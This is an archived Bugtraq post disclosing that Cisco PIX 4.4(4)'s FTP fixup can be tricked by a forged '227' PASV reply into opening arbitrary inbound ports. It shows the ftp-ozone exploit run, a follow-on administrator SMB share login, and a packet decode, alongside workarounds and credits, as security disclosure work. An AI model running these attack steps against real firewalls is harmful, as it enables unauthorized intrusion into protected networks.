Bugtraq mailing list archives
Verified PIX vulnerability to FTP-Pasv attack.
From: monti () USHOST COM (monti)
Date: Sun, 19 Mar 2000 15:07:44 -0600
Greetings, I sent this to Cisco about 2 weeks ago, and have received a few responses. Apparentlly a fix is in the works, and may already have been released by this time unbeknownst to me (although I looked for it and have not found it yet). In any case, I thought it would be valuable to eventually post this so that sysadmins had a little more information about how PIX is affected along with a few possible workarounds. The problem is definitely very serious, and there are major differences with the way the PIX is affected than Firewall-1. Note: This analysis relates solely to the 'server' attack, not the 'client' variation of the attack that Mikael Olsson and Dug Song have discussed most recently. Mikael's initial posting about the Firewall-1 ftp-pasv vulnerability did prompt me to look into the PIX further though. As has been already publicized, outbound connections from clients are also subject to manipulation. Please see the credits in the attached message. Eric Monti Denmac Systems ericm () denmac com monti () ushost com 847.291.7760 Summary: -------- I confirmed and did some more research regarding the PIX hole mentioned by Jacek Lipkowski on bugtraq entitled: Re: Addendum to Firewall-1 FTP Server Vulnerability It is unknown whether Cisco has been made aware of this vulnerability, and as such I am forwarding my findings. I was able to verify that PIX is vulnerable to the FTP-Pasv vulnerability that has been discussed on the Bugtraq mailing list as of late. Here are my notes and findings. In a nutshell the PIX can be fooled into opening up ports for inbound connections to a DMZ FTP server if the FTP server can be fooled into sending back what looks like a valid "227 (xxx,xxx,xxx,xx,prt,prt) response. The problem on the PIX is that the 'fixup protocol ftp' component does not provide sufficient enough checks to verify PASV connections before creating a dynamic hole through the firewall. Note that there are several ways to get the FTP server to generate the message that will trigger PIX's insecure behaviour. Please see the 'Relevant Links' section for more on this. The exploit used for testing was Dug Song's ftp-ozone.c which was posted to bugtraq. The PIX tested is running the 4.4(4) version of software. Other versions have not been tested but are most likelly vulnerable. Exploit notes: -------------- Here is the session from the attacker. "ftp-ozone" is the public exploit from Dug Song. I made a few minor 'asthetic' adjustments and added support for anonymous login with '-l' (although it wasnt used in this example). The source code is attached. -snip- --------------Exploit Launched----------------- [root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139 220 victim Microsoft FTP Service (Version 4.0). Garbage packet contains: 500 '........................................................................................................................... Money packet contains: 227 (10,1,2,3,0,139)': command not understood -------------Opened port connected (NBT)------- [root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0 Password: ******** Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0] smb: \> dir AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58 2000 boot.ini ASR 279 Mon Mar 13 03:15:07 2000 CONFIG.SYS A 0 Mon Mar 13 03:22:58 2000 IO.SYS AHSR 0 Mon Mar 13 03:22:58 2000 MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58 2000 MSSCE D 0 Tue Mar 7 14:29:57 2000 NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49 2000 ntldr AHSR 156496 Tue Mar 7 11:47:49 2000 pagefile.sys A1073741824 Tue Mar 7 11:51:51 2000 Program Files D 0 Tue Mar 7 11:35:11 2000 RECYCLER DHS 0 Mon Mar 13 09:35:51 2000 TEMP DA 0 Tue Mar 7 14:36:31 2000 WINNT D 0 Tue Mar 7 14:30:05 2000 64706 blocks of size 65536. 43841 blocks available smb: \> quit -snip-- As you can see above; after the manipulated packet generated from the FTP server by ftp-ozone is returned, we are able to connect to the NBT(tcp/139) service and access a share. On the PIX with 'logging console debug' set, this was all that showed up: 302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr 10.1.2.3/21 laddr 192.168.205.2/21 I have attached a packet decode generated from tcpdump -w. The IP's used are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3, victim-real=192.168.205.2(doesnt appear in decode) The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously). In Packet #11 of the decode, in the TCP data segment, you can see what is triggering the PIX's insecure behavior: "227 (10,1,2,3,0,139)': command not understood." This confirms what was assumed; that the only check that the PIX makes before creating a dynamic PASV conduit is whether the "227 (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the packet. Synopsis/Workarounds: --------------------- Essentially this is the same as the more widely publicized Firewall-1 incarnation of the hole (without their patch), only there are a few major differences to note: 1. The port opened will allow bi-directional traffic (confirmed in PIX 4.4(4), probably others as well). 2. *ANY* port can be opened, even low-numbered and well-known ports. This could be worked around with a conduit ACL using explicit denies on the external interface. 3. The 'fixup protocol ftp' is what appears to be the core of this problem on the PIX side of it. If it is disabled the exploit (in any version) will not work. This is what handles PASV FTP on the PIX. If you disable it though, there are two things to note: Outbound ftp connections from the inside *have* be made with PASV ftp clients. Inbound ftp connections from the outside world cannot use PASV. There may be other workarounds than those cited above. Any comments/suggestions are welcome! Relevant Links: --------------- Vulnerability description/workarounds for Firewall-1 incarnation of the bug: http://www.securityfocus.com/vdb/bottom.html?vid=979 Link to bugtraq mailing list archive discussing vulnerability and Checkpoint workaround (please note comments about the problems with the Checkpoint patch and some of the things to watch out for in implementing a fix): Pine.LNX.4.21.0002142201030.4674-100000 () ns ldc ro ">http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-8&thread=Pine.LNX.4.21.0002142201030.4674-100000 () ns ldc ro </A> Link to Checkpoint's patch: http://www.checkpoint.com/techsupport/alerts/pasvftp.html Credits: -------- I did not find this hole (initially). It was discovered officially and publicized by several other people. Much thanks goes to these folks! Jacek Lipkowski sq5bpf () ACID CH PW EDU PL For originally verifying PIX's vulnerability based on Firewall-1 discussions. Mikael Olsson mikael.olsson () enternet se For original bugtraq postings, insights regarding this issue, and Firewall-1 confirmation. Dataprotect: John McDonald <jm () dataprotect com> Thomas Lopatic <tl () dataprotect com> For their verification of the vulnerability on Checkpoint Firewall-1. Dug Song: dugsong () monkey org For original public exploit code. Please see www.securityfocus.com bugtraq archive for all relevant posts. I am copying all of the above people, and will be waiting for 10 days for a response from Cisco regarding this hole before releasing any more information publicly. If need be, I can wait longer if a fix is in the works, although the existence of the bug has already been made public. I cannot control whether this will be forwarded to other parties by the other people CC'd so I leave that to their discretion. Thanks, Eric Monti Denmac Systems ericm () denmac com 847.291.7760 Packet 1 Timestamp: 15:02:37.130283 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 60 bytes Identification: 0x04CF Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1D4C Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818403974 Acknowledgement Number: 0000000000 Header Length: 40 bytes (data=0) Flags: URG=off, ACK=off, PSH=off RST=off, SYN=on, FIN=off Window Advertisement: 128 bytes Checksum: 0x78CB Urgent Pointer: 0 <Options not displayed> TCP Data <No data> ----------------------------------------------------------------- Packet 2 Timestamp: 15:02:37.130720 Source Ethernet Address: 00:D0:B7:0E:18:AB Destination Ethernet Address: 00:50:04:28:FE:EB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 44 bytes Identification: 0x4311 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 128 Encapsulated Protocol: TCP Header Checksum: 0x9F19 Source IP Address: 10.1.2.3 Destination IP Address: 10.1.2.4 TCP Header Source Port: 21 (ftp) Destination Port: 1139 (<unknown>) Sequence Number: 1212576390 Acknowledgement Number: 1818403975 Header Length: 24 bytes (data=0) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=on, FIN=off Window Advertisement: 8760 bytes Checksum: 0x8CFE Urgent Pointer: 0 <Options not displayed> TCP Data <No data> ----------------------------------------------------------------- Packet 3 Timestamp: 15:02:37.130765 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 40 bytes Identification: 0x04D0 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1D5F Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818403975 Acknowledgement Number: 1212576391 Header Length: 20 bytes (data=0) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=off, FIN=off Window Advertisement: 128 bytes Checksum: 0xC673 Urgent Pointer: 0 TCP Data <No data> ----------------------------------------------------------------- Packet 4 Timestamp: 15:02:37.131178 Source Ethernet Address: 00:D0:B7:0E:18:AB Destination Ethernet Address: 00:50:04:28:FE:EB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 88 bytes Identification: 0x4411 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 128 Encapsulated Protocol: TCP Header Checksum: 0x9DED Source IP Address: 10.1.2.3 Destination IP Address: 10.1.2.4 TCP Header Source Port: 21 (ftp) Destination Port: 1139 (<unknown>) Sequence Number: 1212576391 Acknowledgement Number: 1818403975 Header Length: 20 bytes (data=48) Flags: URG=off, ACK=on, PSH=on RST=off, SYN=off, FIN=off Window Advertisement: 8760 bytes Checksum: 0x0458 Urgent Pointer: 0 TCP Data 220 wapp2 Microsoft FTP Service (Version 4.0).. ----------------------------------------------------------------- Packet 5 Timestamp: 15:02:37.131204 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 40 bytes Identification: 0x04D1 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1D5E Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818403975 Acknowledgement Number: 1212576439 Header Length: 20 bytes (data=0) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=off, FIN=off Window Advertisement: 80 bytes Checksum: 0xC673 Urgent Pointer: 0 TCP Data <No data> ----------------------------------------------------------------- Packet 6 Timestamp: 15:02:47.126818 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 163 bytes Identification: 0x04D2 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1CE2 Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818403975 Acknowledgement Number: 1212576439 Header Length: 20 bytes (data=123) Flags: URG=off, ACK=on, PSH=on RST=off, SYN=off, FIN=off Window Advertisement: 128 bytes Checksum: 0x96BF Urgent Pointer: 0 TCP Data ........................................................................................................................... ----------------------------------------------------------------- Packet 7 Timestamp: 15:02:47.248131 Source Ethernet Address: 00:D0:B7:0E:18:AB Destination Ethernet Address: 00:50:04:28:FE:EB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 40 bytes Identification: 0x4511 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 128 Encapsulated Protocol: TCP Header Checksum: 0x9D1D Source IP Address: 10.1.2.3 Destination IP Address: 10.1.2.4 TCP Header Source Port: 21 (ftp) Destination Port: 1139 (<unknown>) Sequence Number: 1212576439 Acknowledgement Number: 1818404098 Header Length: 20 bytes (data=0) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=off, FIN=off Window Advertisement: 8637 bytes Checksum: 0xA48B Urgent Pointer: 0 TCP Data <No data> ----------------------------------------------------------------- Packet 8 Timestamp: 15:02:47.248184 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 69 bytes Identification: 0x04D3 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1D3F Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818404098 Acknowledgement Number: 1212576439 Header Length: 20 bytes (data=29) Flags: URG=off, ACK=on, PSH=on RST=off, SYN=off, FIN=off Window Advertisement: 128 bytes Checksum: 0x2602 Urgent Pointer: 0 TCP Data 227 (10,1,2,3,0,139). ----------------------------------------------------------------- Packet 9 Timestamp: 15:02:47.248558 Source Ethernet Address: 00:D0:B7:0E:18:AB Destination Ethernet Address: 00:50:04:28:FE:EB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 168 bytes Identification: 0x4611 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 128 Encapsulated Protocol: TCP Header Checksum: 0x9B9D Source IP Address: 10.1.2.3 Destination IP Address: 10.1.2.4 TCP Header Source Port: 21 (ftp) Destination Port: 1139 (<unknown>) Sequence Number: 1212576439 Acknowledgement Number: 1818404127 Header Length: 20 bytes (data=128) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=off, FIN=off Window Advertisement: 8608 bytes Checksum: 0x168C Urgent Pointer: 0 TCP Data 500 '........................................................................................................................... ----------------------------------------------------------------- Packet 10 Timestamp: 15:02:47.248599 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 40 bytes Identification: 0x04D4 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1D5B Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818404127 Acknowledgement Number: 1212576567 Header Length: 20 bytes (data=0) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=off, FIN=off Window Advertisement: 128 bytes Checksum: 0xC52B Urgent Pointer: 0 TCP Data <No data> ----------------------------------------------------------------- Packet 11 Timestamp: 15:02:47.248836 Source Ethernet Address: 00:D0:B7:0E:18:AB Destination Ethernet Address: 00:50:04:28:FE:EB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 94 bytes Identification: 0x4711 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 128 Encapsulated Protocol: TCP Header Checksum: 0x9AE7 Source IP Address: 10.1.2.3 Destination IP Address: 10.1.2.4 TCP Header Source Port: 21 (ftp) Destination Port: 1139 (<unknown>) Sequence Number: 1212576567 Acknowledgement Number: 1818404127 Header Length: 20 bytes (data=54) Flags: URG=off, ACK=on, PSH=on RST=off, SYN=off, FIN=off Window Advertisement: 8608 bytes Checksum: 0x1DD1 Urgent Pointer: 0 TCP Data 227 (10,1,2,3,0,139)': command not understood. ----------------------------------------------------------------- Packet 12 Timestamp: 15:02:47.266742 Source Ethernet Address: 00:50:04:28:FE:EB Destination Ethernet Address: 00:D0:B7:0E:18:AB Encapsulated Protocol: IP IP Header Version: 4 Header Length: 20 bytes Service Type: 0x00 Datagram Length: 40 bytes Identification: 0x04D5 Flags: MF=off, DF=on Fragment Offset: 0 TTL: 64 Encapsulated Protocol: TCP Header Checksum: 0x1D5A Source IP Address: 10.1.2.4 Destination IP Address: 10.1.2.3 TCP Header Source Port: 1139 (<unknown>) Destination Port: 21 (ftp) Sequence Number: 1818404127 Acknowledgement Number: 1212576621 Header Length: 20 bytes (data=0) Flags: URG=off, ACK=on, PSH=off RST=off, SYN=off, FIN=off Window Advertisement: 128 bytes Checksum: 0xC4F5 Urgent Pointer: 0 TCP Data <No data>
Current thread:
- con\con is a old thing (anyway is cool) Ussr Labs (Mar 06)
- Re: con\con is a old thing (anyway is cool) Stephen White (Mar 08)
- Realplayer update pedward () WEBCOM COM (Mar 09)
- Re: con\con is a old thing (anyway is cool) Elias Levy (Mar 11)
- Re: con\con is a old thing (anyway is cool) YUFU (Mar 11)
- <Possible follow-ups>
- Re: con\con is a old thing (anyway is cool) Oliver Friedrichs (Mar 15)
- Re: con\con is a old thing (anyway is cool) Bernd Luevelsmeyer (Mar 17)
- Re: con\con is a old thing (anyway is cool) David LeBlanc (Mar 17)
- Verified PIX vulnerability to FTP-Pasv attack. monti (Mar 19)